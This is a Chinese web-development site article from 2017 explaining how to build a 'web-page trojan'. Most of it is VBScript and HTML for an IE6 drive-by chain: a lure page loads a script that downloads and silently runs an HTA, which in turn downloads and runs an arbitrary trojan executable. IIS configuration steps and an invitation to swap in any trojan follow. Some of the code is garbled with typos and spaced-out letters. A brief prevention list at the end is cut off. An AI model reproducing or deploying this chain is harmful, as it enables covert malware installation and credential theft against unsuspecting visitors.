爱开发联盟是国内专业的网站建设资源、脚本编程学习类网站,提供asp、php、asp.net、javascript、jquery、vbscript、dos批处理、网页制作、网络编程、网站建设等编程资料。让开发变得简单起来!
爱开发联盟是国内专业的网站建设资源、脚本编程学习类网站,提供asp、php、asp.net、javascript、jquery、vbscript、dos批处理、网页制作、网络编程、网站建设等编程资料。让开发变得简单起来!
当前所在位置:主页 > 编程 > ASP编程 >
  • 魔艺客提供SEO\SEM推广整合营销服务
  • 提供整套互联网营销整合方案-魔艺客
  • 魔艺客高端网站建设开发服务十一大优惠服务
  • 资深的网站建设开发经验,一对一服务-魔艺客高
  • 一站式服务,从服务器到网站,三站何以尽在魔
爱开发联盟是国内专业的网站建设资源、脚本编程学习类网站,提供asp、php、asp.net、javascript、jquery、vbscript、dos批处理、网页制作、网络编程、网站建设等编程资料。让开发变得简单起来!

编写网页木马详解

发布时间:2017-09-06 17:17    作者:爱开发联盟    浏览:次    来源:aikaifa.com.cn 分享:

我们经常听到这样的忠告:“不要随意下在不明的程序,不要随意打开邮件的附件...”这样的忠告确实是有用的,不过我们的系统有不少漏洞,许多木马已经不需要客户端和服务端了,他们利用这些系统漏洞按照被系统认为合法的代码执行木马的功能,有的木马会在你完全不知道的情况下潜入,现在我来讲解下通过IE6的漏洞实现访问网页后神不知鬼不觉的下在并执行指定程序的例子,也就是网页木马.



首先我们需要编写几个简单的文件



一。名字为abc.abc的文件
<html>

<script language="vbscript">

Function HttpDoGet(url)

set oReq = CreateObject("Microsoft.XMLHTTP")

oReq.open "GET",url,false

oReq.send

If oReq.status=200 then

HttpDoGet=oReq.respomseBody

Savefile HttpDoGet,"c:win.exe"

End If

Set oReq=nothing

End Function

sub SaveFile(str.fName)

Set objStream = CreateObject("ADODB.Stream")

objStream.Type =1

objStream.Open

objStream.write str

objStream.SaveToFile fName.2

objStream.Close()

set objStream = nothing

exewin()

End sub

Sub exewin()

set wshshell=createobject ("wscript.shell" )

a=wshshell.run ("cmd.exe /c c:win.exe",0)

b=wshshell.run ("cmd.exe /c del c:win.hta",0)

window.close

End Sub

HttpDoGet "http://127.0.0.1/test.exe"

</script>

</html>



其中test.exe为木马程序,实现必须放在WEB发布的目录下,文件abc.abc也必须保存在发布的目录下。



二。名字为test.htm的文件

<html><body>

木马运行测试!(这句话可以改成你想说的)

<object date="http://127.0.0.1/win.test";;;></object>

</body></html>



三。名字为win.test的文件

<html>

<body>

<script language="vbscript">

Function HttpDoGet(url)

set oReq = CreateObject("Microsoft.XMLHTTP")

oReq.open "GET",url,false

oReq.send

If oReq.status=200 then

HttpDoGet,"c:win.hta"

Set oReq=nothing

End if

end function

sub SaveFile(str,fName)

Dim fso, tf

S e t f s o = C r e a t e O b j e c t(Scripting.FileSystemObject")

Set tf = fso.CreateTextfile(fName,True)

tf.Write str

tf.Close

exewin()

End sub

Sub exewin()

set wshshell=createobject ("wscript.shell" )

a=wshshell.run ("cmd.exe /c c:win.hat",0)

window.close

End Sub

HttpDoGet("http://127.0.0.1/abc.abc")

</script>

</body>

</html>


四。名字为test.exe的木马程序。



...这个就不用我提供了吧,你想用什么木马就把他的名字换成test.exe传上去就可以了。



服务器的文件列表

test.htm:对外发布的网页

win.test:下在文件abc.abc到对方机器上,并且保存为win.hta并且执行。

abc.abc下载二进制的木马文件test.exe,并执行。

test.exe:木马程序。



上面所说的文件可以修改成任意名字,只是不要忘记把源码里的文件指向也修改就可以了!



最后是设置IIS,打开“程序→管理工具→internet服务管理器”,右键单击要设置的站点,选择《属性》,在选择“http头”。单击“MIME映射”里的“文件类型”按钮,并在关联扩展名文本框中输入“.hta”,在内容类型(MIME)中输入“application/hta",然后关闭所有窗口就可以了。



有许多朋友多遇见过,说什么赠送Q号或者玩网游的时候里面有人喊赠送好东东在XXX网址,其实那上面所说的例子用的就是这种原理,不知不觉中你机器上的所有有关于密码或者指定名词的东西全发送到对方指定的邮件箱里去了



看完后是否觉得这种木马太危险,甚至有种想把网线拔掉的感觉那?呵呵,其实了解了网页木马的工作原理后我们就不难防护他,看完以上内容后就可以得出一个结论,网页木马主要利用IE的漏洞来实现的,所以在预防的时候一定要做到以下几点就可以保证上网的安全了,

A。安装IE的最新版本并且随时下在才做系统和IE的补丁程序。

B。不随便登陆不熟悉朋友送来的网站,对于熟悉的朋友也要小心哦。

C。不随便登陆色情网站,还有一些卖

网友评论

分类排行榜联系我们

好文推荐联系我们

爱开发联盟是国内专业的网站建设资源、脚本编程学习类网站,提供asp、php、asp.net、javascript、jquery、vbscript、dos批处理、网页制作、网络编程、网站建设等编程资料。让开发变得简单起来!
爱开发联盟是国内专业的网站建设资源、脚本编程学习类网站,提供asp、php、asp.net、javascript、jquery、vbscript、dos批处理、网页制作、网络编程、网站建设等编程资料。让开发变得简单起来!

当前最新内容联系我们

爱开发联盟是国内专业的网站建设资源、脚本编程学习类网站,提供asp、php、asp.net、javascript、jquery、vbscript、dos批处理、网页制作、网络编程、网站建设等编程资料。让开发变得简单起来!

在线手册

网站地图导航

前端 HTML/Xhtml HTML5 CSS XML/XSLT Dreamweaver教程 Frontpage教程 心得技巧 编程 JavaScript ASP.NET PHP编程 正则表达式 AJAX相关 ASP编程 JSP编程 Flex 脚本加解密 web2.0 XML/RSS 网页编辑器 相关技巧 安全相关 网页播放器 Dart 其它综合 脚本 VBS DOS/BAT HTA HTC Python perl 游戏相关 vba 远程脚本 ColdFusion ruby专题 autoit seraphzone PowerShell linux shell Lua Golang Erlang 脚本下载 广告代码 js框架 批处理 网页相关 源码下载 数据库 MsSql Mysql mariadb oracle DB2 mssql2008 mssql2005 SQLite PostgreSQL MongoDB Redis Access 数据库文摘 数据库其它 CMS dedecms ecshop z-blog UcHome UCenter 风讯CMS 科汛cms discuz 新云cms phpwind 动易cms phpcms 帝国cms WordPress drupal 其它cms 设计 photoshop教程 摄影教程 Fireworks教程 CorelDraw教程 Illustrator教程 Painter教程 Freehand教程 Indesign 设计素材 平面其它 微信相关 微信公众号 小程序 操作系统 bios 系统安装 系统进程 Windows系列 LINUX RedHat/Centos Ubuntu/Debian Fedora Solaris 麒麟系统 红旗Linux Unix/BSD 苹果MAC 注册表 其它系统 网站运营 建站经验 微信营销 网站优化 网站策划 网络赚钱 网络创业 站长故事 alexa域名 其它相关 网络安全 黑客教程 安全设置 杀毒防毒 病毒查杀 脚本攻防 黑客入侵 工具使用 业界动态 Exploit 漏洞分析 加密解密 手机黑客 安全其它 在线手册 网页制作 脚本编程 数据库相关 软件编程 系统相关 其它相关 源码下载

友情链接申请加入

51CTO 上海魔艺客 猫鼬设计开发 Erlo网站开发 猫鼬设计工作室 新发现全球资讯 信息安全与IT资讯
爱开发联盟是国内专业的网站建设资源、脚本编程学习类网站,提供asp、php、asp.net、javascript、jquery、vbscript、dos批处理、网页制作、网络编程、网站建设等编程资料。让开发变得简单起来!

283882409